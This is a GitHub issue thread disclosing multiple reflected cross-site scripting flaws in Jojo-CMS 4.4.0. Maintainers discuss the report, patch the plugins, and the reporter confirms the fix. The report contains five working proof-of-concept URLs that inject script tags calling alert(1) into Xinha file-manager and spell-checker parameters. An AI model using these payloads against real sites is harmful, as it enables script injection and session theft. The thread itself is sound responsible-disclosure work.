search

JojoCMS / Jojo-CMS

Jojo is an SEO-friendly, fast, and extensible PHP-based CMS
http://www.jojocms.org/
GNU Lesser General Public License v2.1
20 stars 8 forks source link

Jojo-CMS – Multiple Cross-Site Scripting (XSS) #29

Closed bestshow closed 7 years ago

bestshow commented 7 years ago

Procuct: Jojo-CMS Download: http://www.jojocms.org/ Vunlerable Version: 4.4.0 and probably prior Tested Version: 4.4.0 Author: ADLab of Venustech

Advisory Details: I have discovered multiple Cross-Site Scripting (XSS) in Jojo-CMS, which can be exploited to execute arbitrary code. The vulnerabilities exists due to insufficient filtration of user-supplied data in multiple HTTP GET parameter passed to several pages. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation examples below uses the "alert()" JavaScript function to see a pop-up messagebox: Poc: (1) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/ExtendedFileManager/editor.php?mode=x;%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cscript%3E (2) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/ExtendedFileManager/editorFrame.php?mode=x;%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E%3Cscript%3E (3) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/ExtendedFileManager/images.php?mode=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22 (4) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/ExtendedFileManager/manager.php?mode=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22 (5) http://localhost/teststh4/Jojo-CMS-master/Jojo-CMS-master/plugins/jojo_core/external/xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22

frankblundt commented 7 years ago

CVE?

bestshow commented 7 years ago

Hi: CVE means “Common Vulnerabilities and Exposures”,and you can gain more information on website http://cve.mitre.org/ if you are interested. However, it does not matter, if you fix these vulnerabilities, I will request a CVE by myself. Thanks.

Sincerely

bestshow commented 7 years ago

Is there anyone who can handle this issue ?

frankblundt commented 7 years ago

I’m sure someone will look at it eventually. It’s not really a priority at the moment.

Thank you for finding it and posting it though :)

On 23/02/2017, at 5:58 AM, bestshow notifications@github.com wrote:

Is there anyone who can handle this issue ?

— You are receiving this because you commented. Reply to this email directly, view it on GitHub https://github.com/JojoCMS/Jojo-CMS/issues/29#issuecomment-281731300, or mute the thread https://github.com/notifications/unsubscribe-auth/ABkuS3tQli6tO3CXMbdOMns_UHtf2e1Wks5rfGlSgaJpZM4MDPNj.

antonyspalding commented 7 years ago

Hi, We have just put up a patch that should fix this issue.

Please test and let us know if it covers all your concerns.

antonyspalding commented 7 years ago

Hi Bestshow, We have now patched the spellchecker plugin as well.

Do these changes address your concerns?

cheers, Antony

bestshow commented 7 years ago

@antonyspalding Yes,the patch address the issue,thanks.